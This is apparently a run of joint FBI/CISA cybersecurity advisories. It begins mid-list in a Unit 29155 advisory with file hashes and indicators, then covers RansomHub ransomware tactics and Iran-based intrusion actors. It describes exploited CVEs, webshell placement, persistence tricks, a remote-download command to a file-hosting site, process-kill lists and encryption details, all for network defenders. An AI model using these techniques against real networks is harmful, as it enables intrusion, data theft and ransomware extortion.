u".PHP5"	u".PHP6"	u".PHP7"	u".PHPS"	u".PHTML"	u".PNG"
u".POT"	u".POTM"	u".POTX"	u".PPAM"	u".PPK"	u".PPS"
u".PPSM"	u".PPSX"	u".PPT"	u".PPTM"	u".PPTM"	u".PPTX"
u".PS1"	u".PSD"	u".PST"	u".RAR"	u".RAW"	u".RTF"
u".SAV"	u".SCH"	u".SHTML"	u".SLDM"	u".SLDX"	u".SLK"
u".SLN"	u".SNT"	u".SQ3"	u".SQL"	u".SQLITE3"	u".SQLITEDB"
u".STC"	u".STD"	u".STI"	u".STW"	u".SUO"	u".SVG"
u".SXC"	u".SXD"	u".SXI"	u".SXM"	u".SXW"	u".TAR"
u".TBK"	u".TGZ"	u".TIF"	u".TIFF"	u".TXT"	u".UOP"
u".UOT"	u".VBS"	u".VCD"	u".VDI"	u".VHD"	u".VMDK"
u".VMEM"	u".VMSD"	u".VMSN"	u".VMSS"	u".VMTM"	u".VMTX"
u".VMX"	u".VMXF"	u".VSD"	u".VSDX"	u".VSWP"	u".WAR"
u".WB2"	u".WK1"	u".WKS"	u".XHTML"	u".XLC"	u".XLM"
u".XLS"	u".XLSB"	u".XLSM"	u".XLSM"	u".XLSX"	u".XLT"
u".XLTM"	u".XLTX"	u".XLW"	u".YML"	u".ZIP"

Malware Related to Tbopbh.jpg

stage2.exe and its respective payload, Tbopbh.jpg, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.

Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll.

Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The hashes in Table 26 represent both byte orders.

Table 26: Files Located in Discord Cluster 1

Filename	MD5 (Reversed)	MD5 (Functional)
Afgyyppsysmtddhvhhaw.dll	d034fe4c71b16b6d331886c24fef2751	4074798a621232dc448b65db7b1fdd66
Avbbwys.dll	422437f326b8dbe30cc5f103bde31f26	7f84263fd24f783ff72d5ae91011b558
Azkebvoyswvjnrpmn.dll	562c337b8caca330da2ea6ae07ee5db6	f73d203bdf924658fd6edf3444c93a50
Budoejokuqbge.dll	58e879213d81333b628434ba4aeb2751	08dfebc04eb61c9a6d87b6524c1c0f2e
Bwqdffttejlkeqe.dll	1c85c0d044ac837e8939564afac1eb32	8633bd2bbbb5da22c3f8751150186c42
Bxqbsyxfkjzmhdtfceoak.dll	7234da8ceafbe6586469f18c03cc1832	5f4df6dd8e644d59eaf182e500b5e7bf
Clsrncpbaucrabuobcpale.dll	618d62dd95fd9aeb855fe2ef1403dce5	955e4c198ee58e40fe92cb74ceefdf00
Cpdvzvzyghy.dll	d40195a444526eafb0db56d95bf8655d	a905d620717f75751aa94ceb88995dbc
Ctiktdfyauejxfak.dll	d06761b2cff86035a4838110ed6ab622	2ca6bcf16ee4293a771a1cf7b7b9ee49
Czxhayyankwsp.dll	59da31da4db1aa5f9a5c7c0c151422c8	de1bf141976776becd376a0dac400df6
Djpajq.dll	de1f9d1f0336ddcff832ad3900acd2f1	974e7c0b3660fbf18f29eac059f85ac0
Dmdtflkcgebf.dll	394e056cb6cb732dfd5e0d45d3dae938	4d8343c40be53d6521244fe74393d937
Ejcpaujkmvjndgqznimmkgd.dll	b7c1a8d39f46eaf52be90e24565dd6b0	7a70d5fbbafe3454b76e3ad2f009618f
Encuutwvdqbxlxh.dll	2b39eab325906b0a3ab7e584c3d67349	df4f856f783d23fb01af1e0e64bc0e20
Esalfjyraquwfxcgufwzip.dll	80f0ee332a452172533ad8863bb3bc63	f4f4e55a00d2f3a433c9e5624285ac1c
Fdgofjdvmmllgsxunb.dll	9345425cf07b4c39a80cd8540e08bfde	eef2363744345741e09fe5380eeb4df3
Fkhzvcuucaprsibp.dll	aecb57e20d2c0b0d9fece2cbcbcc3459	4bce4831b1dd71f19c55b3e3b5e99856
Fkthhyexkr.dll	58dc7c9577ff90a046359ca255c0c9f4	19cb20c4e7dbfe15c1aa284752d0fecb
Fqattuyxknkhv.dll	5c9e2195d10375b746b6717fdb47b5b9	2b5f159f022109a8de1bc5dd9e3138a0
Fqyubbzbubsge.dll	afbb9459d4a0f60d7ffb3b3532d11bc2	8d3d4d702ba6b4be2766a41bfe5ff76e
Frkmlkdkdubkznbkmcf.dll	b3370eb3c5ef6c536195b3bea0120929	e61518ae9454a563b8f842286bbdb87b
Gsiook.dll	a1b509254a0a1daa7e00d279ec974461	0e03103e8110785156105946e48ea9e0
Gutjuhi.dll	791a81f31a8e7090a7d5417451e09efa	fba76f4eb2e7a2eb17193bebe290a198
Hisvswmeswmnqbvzpoxzx.dll	e1a15bc13157134f542cd9c55c742460	c9d1677f4f89b95b41591b23a1dc1a63
Hsoahb.dll	cd62d4a178705b2b90a8babd8613df93	032f5642d4fb2fdd74e6f20a13c57746
Icyjkszdzgoxdfuwptkwxo.dll	f34f60375bebad861a35b7c4bb0fa1c8	a66b3b22a3619f739b197d0d443b700c
Jdfzavlqr.dll	7fe7f33d9b5dbdf3d032d2a10e39f283	8cfef66b390f08bdbfd940922cf51650
Jrdggfjvve.dll	b32e14a9b7de6c92cd16758fa6e23346	1220b580cef1bf22351e271773945d20
Jteieurqgvpgnhw.dll	b85538f665fdb6c8d9a74f2df7369832	ffa68749aa3fc6495e2c49b01d964339
Kbuqtmznmodjzvxvwxcvho.dll	869742fb9db71fdb66f00528fe2966ec	5b884f15dc9b072d7bbad9ec2b249f38
Kdmvyizz.dll	2128361d8aaae1225d50c9add32006a1	9152c9de57b5647ee4ab3dff551dc8dd
Kfxghcmg.dll	56e0446a6d7175a0d09110bc483ddbed	fc418fdda06ce5982153766dcefb71d9
Krewcizfplntbwcqawfhtfpd.dll	6a4fca88ee36fecc5113e188cc39d25c	5c3b0040e2dece6e17093ae607b79044
Lsurhpmpyewhv.dll	143594597130e301499e5940a5fb798a	911c7e82f32f78577dcd725a7adb114d
Mbkzrkfasxgxtzhgpgsehip.dll	993f01861aff306df44e6475f7886f37	e4634ef9bfe7b598b857ad997445b239
Mhnovdgzzidqx.dll	64b9feeccf6c183b9f7138f8fc53acbb	7e0c42d33921a89724424f17c97037bd
Mlfampnfnmjvjnahkrawwqd.dll	ddec2d79f460a881849037336ba8968f	d973210977957209f255b58eb1715b12
Mppveiyannobrcdlkd.dll	9606b4720a0e73ef1f00505a11aab2f7	0adc2530cf348c0a3d53a680291a3d67
Mzhyeemgqbmamubqn.dll	f772f5c65d65412f61ef5f2660e33ceb	f8ffd1eab6223e31b15d0fd6c3c0472e
Nbbudwt.dll	875f9200b49db08c33962b0a6bd05ab9	2e035360971a817b854d7d5a2b008717
Nhqcfzagulwaw.dll	fa97dbe84ce7717b754795fa89f13dce	601c12596dfea84c2113ae5ee59a52ec
Nlzhpvuzzoycqnnpl.dll	d8c04ecd646a1f8537a59f63518ef3c6	47f4534da421daf8089cf34d53f6bb6e
Noubvdigjlwsnqiylzgikkk.dll	3bcff990faacbebb8fb470dfe03e2543	683546b9171a1ea284a96d1b45d1d823
Nvxwbzciqarteyuz.dll	c265188fdadddb648629e8060601dca7	af85885a74cfe099676af542dcdc5741
Nykfvwmchighqwcguabvgq.dll	8a2ba7f9cb6f65edf65dbe579907551e	673586594242d99ab02118595e457297
Ofgdwttnmqibnmpqx.dll	9657c2ef6ed5229740b125df9ca6c915	0dc5ac12f7690db15c99eaabc11b129c
Ohtvepefcjnchrrasokn.dll	a5494ffd9efb7c3df59c527076a05e62	e2cc52273d56ed66c800a726760c1ed0
Olkscszculdbzvco.dll	85afdef18d65b0518d709a5a324ea57a	77675a24040f10c85112d9a219d5f1c7
Onkwzkpfuqazvali.dll	da4d81f9ef3b25ea09f34481d923dd9d	cc4a9db6f250114e26d8d9ba6ab46bc9
Opaqwrazeyyilbbjlkf.dll	0e6374042b33d78329149a6189a7cb46	1934e2ebc64d41e37ef53ea0c075e974
Owxtabfdqhkaahhwsgkatuu.dll	d33f608f561096be24cba91797e0da2f	332b7f6662e28e3577bd1b269904b940
Poezcjhvkzgmnyqljpbte.dll	32db8abce1618e60441f5c7cf4be0d22	2b2509c6ee46d6327f2f1c9a75122d15
Rvyqctymumtudroyae.dll	dd2431b1f858b4ca14a4ea05fb8c4a06	9b2924c727aa3a061906321a66c9050c
Sutragevr.dll	7d3b529db1bd896d9fd877b85cafdc64	de276cf07ccffa18d7ffc35281bca910
Sxkdxclqmxnmjgedhgagl.dll	6e1394938c2fecad2d4f5b3bcf357ec0	d6b41747cb035c4c2b08790cd57f0626
Tosyxesxgrzyb.dll	99305ce01cc2d0f58cd226efb2de893f	6859fe5a3eead00a563cd93efcc6ea96
Tpmnkauftdydomyz.dll	6c152774f6894407075e6f0a2859bbae	981160dee6cd25fb181e54eca7ff7c22
Tptjtwfhpsjfksqoajt.dll	343b140977b3f9b227e7e5f82b0fadb5	95cf2a5a24b0d33d621bb8995d5826bc
Tsgblplhdwwj.dll	54a9fa9eb337a3b5ca7b0fa4553e439d	cee5acbfef7e76f52f40b8ae95199c50
Uqhznlcagzyoqrbyylnnwn.dll	4c19aeecbfca13b8a199703d8b8284b9	ad0ca738aa6c987e4ee1a87ff2b8acd5
Uslrfkxccdyetfdxmaokbhv.dll	dc795cb9290b1bc0b7fb1ce9d6ae7c93	552d9b79cc544fc6c3e8aa204dd00811
Waordspinycera.dll	9935a86108e3ae3f72cd15817601dcc6	5d063eecd894d3d523875bc82ef6f319
Wcfsobntsczz.dll	77aa3f342a0d69fda67c853bcc004d48	d0b00a6c83ce810ec2763af17e8ab1c4
Wpqyhvfnunlabx.dll	03af632aa6f87bf9dd4364ee3b612cbb	9f11e915be5c0d02a3130329cf032a28
Wqwpawlulyrsrjcbvuvddeud.dll	41871fef433d7b4b89fd226fe3a1a2c0	e21fe98cc8866c0eeecf3549ebcec751
Wqxpgvsgvhygmfbziucxcuh.dll	246d9f9831b125ea7e6ef21bc4c8a0ca	dea3ae8225913dd98148fc86cfc3bcbe
Xgcpgrxhchgwz.dll	9c695be3703194fdb71c212a0832bcf3	8744cec7547b1e73705c10a264e28e08
Xgkepoc.dll	69e58c5ee69f5e5e8a58f4afdd59adfe	d43446b4a22a597b93b559821ee5ac9b
Xlfthpiq.dll	540ee8e39150c539fea582b0e77be7b0	3fe96ff4a5ef0f5346ce645a2a893597
Xlocky.dll	0a2affa6d895baab087b84e93145da35	246f31c86bbbe7f65c0126cf4a1a947a
Xqblktvxmnxrzwiuqdfxzrd.dll	569c1d31f4c7ec7701d8e4e51b59fe85	5eaa7e812733a5c8cda734fab2f752d5
Xykqrksoqqgyuckfc.dll	09a2d85e809d36bff82bd5ab773980a3	96964aed18f65a7acae632f358a093f6
Yawyjonk.dll	3ccf799ff208981349cee4fb1a1cf88c	4e9c55c6fe25d61ca4394de794546fab
Yrknbt.dll	6154760e602bd71192d93f72fbdb486e	94bf96b76c2a092de8962496ce35deaf
Yvbmuigfihprdxgiirp.dll	b0d0a23766fa64ece9315f37b28bb4c0	1e22d64f263e8ea4b2d37dcd9b7c3012
Ywrovtjimixpmizuln.dll	ca43a241042b5fcc305393765ae18e69	28d571ddb5c04d065dfe1be9604663ba
Zfgdccnwnee.dll	251f3a4757d9e4de0499cc30c0bc00a9	755dac7edd17fbf5b5c449dd06c02e14
Zkuxhxwbvifejn.dll	9d7ab8b0aa669125d9a5adc4f46c56f3	af277ae0fbf6cc20f887696ea4756d46
Zsdflpivel.dll	a9c9c0be8eca3b575c24da0fcf1af1a9	1cac5c0cb8801e8730447023270d8d56

Appendix B: Indicators of Compromise

Table 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.

Table 27: IP Addresses Associated with Unit 29155 Infrastructure

IP Address
5.226.139[.]66
45.141.87[.]11
46.101.242[.]222
62.173.140[.]223
79.124.8[.]66
90.131.156[.]107
112.51.253[.]153
112.132.218[.]45
154.21.20[.]82
179.43.133[.]202
179.43.142[.]42
179.43.162[.]55
179.43.175[.]38
179.43.175[.]108 (data exfiltration site)
179.43.176[.]60
179.43.187[.]47
179.43.189[.]218
185.245.84[.]227
185.245.85[.]251
194.26.29[.]84
194.26.29[.]95
194.26.29[.]98
194.26.29[.]251

Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.

Table 28: Domains Hosting Jump Host Tooling

Domain Name
interlinks[.]top
https://3proxy[.]ru
https://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber actors and should be investigated prior to blocking.)
https://nssm[.]cc

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).

Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.

The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.

The authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed:

• CVE-2023-3519 (CWE-94)
  • Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.
• CVE-2023-27997 (CWE-787 | CWE-122)
  • A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
• CVE-2023-46604 (CWE-502)
  • The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue.
• CVE-2023-22515
  • A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
• CVE-2023-46747 (CWE-306 | CWE-288)
  • Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
• CVE-2023-48788 (CWE-89)
  • An improper neutralization of special elements used in an SQL command (SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
• CVE-2017-0144
  • The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as “Windows SMB Remote Code Execution Vulnerability” [T1210].
• CVE-2020-1472
  • An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).
• CVE-2020-0787
  • This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability.

Discovery

RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [T1018][T1046][T1059.001].

Defense Evasion

Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe, left on the user’s desktop (C:Users%USERNAME%Desktop) or downloads (C:Users%USERNAME%Downloads) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001].

Privilege Escalation and Lateral Movement

Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods.

Data Exfiltration

Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.

Encryption

RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [T1486]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes:

• "vmms.exe"
• "msaccess.exe"
• "mspub.exe"
• "svchost.exe"
• "vmcompute.exe"
• "notepad.exe"
• "ocautoupds.exe"
• "ocomm.exe"
• "ocssd.exe"
• "oracle.exe"
• "onenote.exe"
• "outlook.exe"
• "powerpnt.exe"
• "explorer.exe"
• "sql.exe"
• "steam.exe"
• "synctime.exe"
• "vmwp.exe"
• "thebat.exe"
• "thunderbird.exe"
• "visio.exe"
• "winword.exe"
• "wordpad.exe"
• "xfssvccon.exe"
• "TeamViewer.exe"
• "agntsvc.exe"
• "dbsnmp.exe"
• "dbeng50.exe"
• "encsvc.exe"

The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.

RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.

The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.

The next two bytes were always seen to be 0x0001.

The next 32 bytes are the public encryption key for the file.

The next four bytes are a checksum value.

The last four bytes are always seen to be the sequence 0x00ABCDEF.

The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe program to delete volume shadow copies [T1490].

Leveraged Tools

See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that, as of August 2024, a group of Iran-based cyber actors continues to exploit U.S. and foreign organizations. This includes organizations across several sectors in the U.S. (including in the education, finance, healthcare, and defense sectors as well as local government entities) and other countries (including in Israel, Azerbaijan, and the United Arab Emirates). The FBI assesses a significant percentage of these threat actors’ operations against US organizations are intended to obtain and develop network access to then collaborate with ransomware affiliate actors to deploy ransomware. The FBI further assesses these Iran-based cyber actors are associated with the Government of Iran (GOI) and—separate from the ransomware activity—conduct computer network exploitation activity in support of the GOI (such as intrusions enabling the theft of sensitive technical data against organizations in Israel and Azerbaijan).

This CSA provides the threat actor’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), as well as highlights similar activity from a previous advisory (Iran-Based Threat Actor Exploits VPN Vulnerabilities) that the FBI and CISA published on Sept. 15, 2020. The information and guidance in this advisory are derived from FBI investigative activity and technical analysis of this group’s intrusion activity against U.S. organizations and engagements with numerous entities impacted by this malicious activity.

The FBI recommends all organizations follow guidance provided in the Mitigations section of this advisory to defend against the Iranian cyber actors’ activity.

If organizations believe they have been targeted or compromised by the Iranian cyber actors, the FBI and CISA recommend immediately contacting your local FBI field office for assistance and/or reporting the incident via CISA’s Incident Reporting Form (see the Reporting section of this advisory for more details and contact methods).

For more information on Iran state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat webpage.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Threat Actor Details

Background on Threat Group and Prior Activity

This advisory outlines activity by a specific group of Iranian cyber actors that has conducted a high volume of computer network intrusion attempts against U.S. organizations since 2017 and as recently as August 2024. Compromised organizations include U.S.-based schools, municipal governments, financial institutions, and healthcare facilities. This group is known in the private sector by the names Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm.[1][2] The actors also refer to themselves by the moniker Br0k3r, and as of 2024, they have been operating under the moniker “xplfinder” in their channels. FBI analysis and investigation indicate the group’s activity is consistent with a cyber actor with Iranian state-sponsorship.

The FBI previously observed these actors attempt to monetize their access to victim organizations on cyber marketplaces. A significant percentage of the group’s US-focused cyber activity is in furtherance of obtaining and maintaining technical access to victim networks to enable future ransomware attacks. The actors offer full domain control privileges, as well as domain admin credentials, to numerous networks worldwide. More recently, the FBI identified these actors collaborating directly with ransomware affiliates to enable encryption operations in exchange for a percentage of the ransom payments. These actors have collaborated with the ransomware affiliates NoEscape[3], Ransomhouse[4], and ALPHV (aka BlackCat) (#StopRansomware: ALPHV Blackcat). The Iranian cyber actors’ involvement in these ransomware attacks goes beyond providing access; they work closely with ransomware affiliates to lock victim networks and strategize on approaches to extort victims. The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin.

Furthermore, the FBI has historically observed this actor conduct hack-and-leak campaigns, such as the late 2020 campaign known as Pay2Key.[5],[6] The actors operated a .onion site (reachable through the Tor browser) hosted on cloud infrastructure registered to an organization previously compromised by the actors. (The actors created the server leveraging their prior access to this victim.) Following the compromise and the subsequent unauthorized acquisition of victim data, the actors publicized news of their compromise (including on social media), tagging accounts of victim and media organizations, and leaking victim data on their .onion site. While this technique has traditionally been used to influence victims to pay ransoms, the FBI does not believe the objective of Pay2Key was to obtain ransom payments. Rather, the FBI assesses Pay2Key was an information operation aimed at undermining the security of Israel-based cyber infrastructure.

Attribution Details

FBI investigation identified that the Iranian cyber actors conduct malicious cyber activity, which FBI assessed to be in support of the GOI. The FBI judges this activity to be separate from the previously referenced ransomware-enabling activity. This group directs their activity towards countries and organizations consistent with Iranian state interests, and typically not of interest to the group’s ransomware affiliate contacts, such as U.S. defense sector networks, and those in Israel, Azerbaijan, United Arab Emirates. Instead, it is intended to steal sensitive information from these networks, suggesting the group maintains an association with the GOI. However, the group’s ransomware activities are likely not sanctioned by the GOI, as the actors have expressed concern for government monitoring of cryptocurrency movement associated with their malicious activity.

The group uses the Iranian company name Danesh Novin Sahand (identification number 14007585836), likely as a cover IT entity for the group’s malicious cyber activities.

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 15.1. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview of Observed Tactics, Techniques, and Procedures

The Iranian cyber actors’ initial intrusions rely upon exploits of remote external services on internet-facing assets to gain initial access to victim networks. As of July 2024, these actors have been observed scanning IP addresses hosting Check Point Security Gateways, probing for devices potentially vulnerable to CVE-2024-24919. As of April 2024, these actors have conducted mass scanning of IP addresses hosting Palo Alto Networks PAN-OS and GlobalProtect VPN devices. The actors were likely conducting reconnaissance and probing for devices vulnerable to CVE-2024-3400. Historically, this group has exploited organizations by leveraging CVE-2019-19781 and CVE-2023-3519 related to Citrix Netscaler, and CVE-2022-1388 related to BIG-IP F5 devices.

Reconnaissance, Initial Access, Persistence, and Credential Access

The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE. The actors’ initial access is usually obtained via exploiting a public-facing networking device, such as Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887), and, more recently, PanOS firewalls (CVE-2024-3400) [T1596][T1190].

Following exploitation of vulnerable devices, the actors use the following techniques:

• Capture login credentials using webshells on compromised Netscaler devices and append to file named netscaler.1 in the same directory as the webshell [T1505.003][T1056].
• Create the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices to deploy a webshell [T1505.003]. Malicious files deployed to this directory include:
  • netscaler.1
  • netscaler.php
  • ctxHeaderLogon.php
• Specifically related to Netscaler, place additional webshells on compromised devices immediately after system owners patch the exploited vulnerability [T1505.003]. The following file locations and filenames have been observed on devices:
  • /netscaler/logon/LogonPoint/uiareas/ui_style.php
  • /netscaler/logon/sanpdebug.php 
• Create the directory /xui/common/images/ on targeted IP addresses [T1133].
• Create accounts on victim networks; observed names include “sqladmin$,” “adfsservice,” “IIS_Admin,” “iis-admin,” and “John McCain” [T1136.001].
• Request exemptions to the zero-trust application and security policies for tools they intend to deploy on a victim network [T1098].
• Create malicious scheduled task SpaceAgentTaskMgrSHR in Windows/Spaceport/ task folder. This task uses a DLL side-loading technique against the signed Microsoft SysInternals executable contig.exe, which may be renamed to dllhost.ext, to load a payload from version.dll. This file has been observed being executed from the Windows Downloads directory [T1053]. 
• Place a malicious backdoor version.dll in C:WindowsADFS directory [T1505.003].
• Use a scheduled task to load malware through installed backdoors [T1053].
• Deployment of Meshcentral to connect with compromised servers for remote access [T1219].
• For persistence and as detection and mitigation occurs, the actors create a daily Windows service task with random eight characters and attempt execution of a similarly named DLL contained in the C:Windowssystem32drivers directory. For example, a service named “test” was observed attempting to load a file located at C:WINDOWSsystem32driverstest.sys [T1505].

Execution, Privilege Escalation, and Defense Evasion

• Repurpose compromised credentials from exploiting networking devices, such as Citrix Netscaler, to log into other applications (i.e., Citrix XenDesktop) [T1078.003].
• Repurpose administrative credentials of network administrators to log into domain controllers and other infrastructure on victim networks [T1078.002].
• Use administrator credentials to disable antivirus and security software, and lower PowerShell policies to a less secure level [T1562.001][T1562.010].
• Attempt to enter security exemption tickets to the network security device or contractor to get the actor’s tools allowlisted [T1562.001].
• Use a compromised administrator account to initiate a remote desktop session to another server on the network. In one instance, the FBI observed this technique being used to attempt to start Microsoft Windows PowerShell Integrated Scripted Environment (ISE) to run the command “Invoke-WebRequest” with a URI including files.catbox[.]moe. Catbox is a free, online file hosting site the actors use as a repository/hosting mechanism [T1059.001].

Discovery

• Export system registry hives and network firewall configurations on compromised servers [T1012].
• Exfiltrate account usernames from the victim domain controller, as well as access configuration files and logs—presumably to gather network and user account information for use in further exploitation efforts [T1482].

Command and Control

• Install “AnyDesk” remote access program as a backup access method [T1219].
• Enable servers to use Windows PowerShell Web Access [T1059.001].
• Use the open source tunneling tool Ligolo (ligolo/ligolo-ng) [T1572].
• Use NGROK (ngrok[.]io) deployment to create outbound connections to a random subdomain [T1572].

Exfiltration and Impact

After infiltrating victim networks, the actors collaborate with ransomware affiliates (including NoEscape, Ransomhouse, and ALPHV [aka BlackCat]) in exchange for a percentage of the ransom payments by providing affiliates with access to victim networks, locking victim networks, and strategizing to extort victims [T1657]. The actors also conduct what is assessed to be separate set of malicious activity—stealing sensitive data from victims [TA0010], likely in support of the GOI.

MITRE ATT&CK Tactics and Techniques

See Table 1 to Table 9 for all referenced threat actor tactics and techniques in this advisory.

